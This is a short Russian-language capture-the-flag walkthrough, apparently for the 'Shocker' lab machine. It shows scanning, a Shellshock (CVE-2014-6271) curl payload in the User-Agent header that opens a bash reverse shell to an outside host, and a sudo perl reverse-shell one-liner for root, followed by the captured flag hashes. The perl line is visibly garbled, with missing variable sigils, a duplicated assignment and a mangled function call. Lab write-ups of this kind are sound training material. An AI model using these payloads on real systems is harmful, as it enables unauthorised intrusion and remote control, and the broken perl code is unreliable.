Обзор сервисов

$ nmap -sV -sC -Pn -oN 10.10.10.56 10.10.10.56

PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_  Supported Methods: OPTIONS GET HEAD POST
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
$ dirbuster http://10.10.10.56 => /cgi-bin/
# stop the scan, then scan the /cgi-bin/ folder with common extensions: php, py, sh

=> http://10.10.10.56/cgi-bin/user.sh => выглядит как shellshock (CVE-2014-6271): CGI-скрипт .sh в /cgi-bin/ под Apache, а при CGI заголовки HTTP-запроса передаются обработчику через переменные окружения — именно это и эксплуатирует shellshock
https://github.com/opsxcq/exploit-CVE-2014-6271

Эксплоит

nc -lnvp 1234
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c '/bin/bash -i >& /dev/tcp/10.10.14.8/1234 0>&1'" http://10.10.10.56/cgi-bin/user.sh

Флаг пользователя

shelly@Shocker:/home/shelly$ ip addr
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:50:56:b9:cb:99 brd ff:ff:ff:ff:ff:ff
inet 10.10.10.56/24 brd 10.10.10.255 scope global ens33
valid_lft forever preferred_lft forever
inet6 dead:beef::250:56ff:feb9:cb99/64 scope global mngtmpaddr dynamic
valid_lft 86208sec preferred_lft 14208sec
inet6 fe80::250:56ff:feb9:cb99/64 scope link
valid_lft forever preferred_lft forever
shelly@Shocker:/home/shelly$ cat user.txt
6ee59368c5520458bf269260fac2a54d

Повышение привилегий

На локальной машине:

nc -lnvp 1235

На удаленной машине:

sudo -l # можем выполнять perl под sudo
sudo perl -e 'use Socket;i="10.10.14.8";i="10.10.14.8";p=1235;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in(p,inet\_aton(p,inet_aton(i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'

Флаг суперпользователя

root@Shocker:~# ip addr
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:50:56:b9:cb:99 brd ff:ff:ff:ff:ff:ff
inet 10.10.10.56/24 brd 10.10.10.255 scope global ens33
valid_lft forever preferred_lft forever
inet6 dead:beef::250:56ff:feb9:cb99/64 scope global mngtmpaddr dynamic
valid_lft 86060sec preferred_lft 14060sec
inet6 fe80::250:56ff:feb9:cb99/64 scope link
valid_lft forever preferred_lft forever
root@Shocker:~# cat root.txt
4977ae2439f875b71ce34dd013a8a178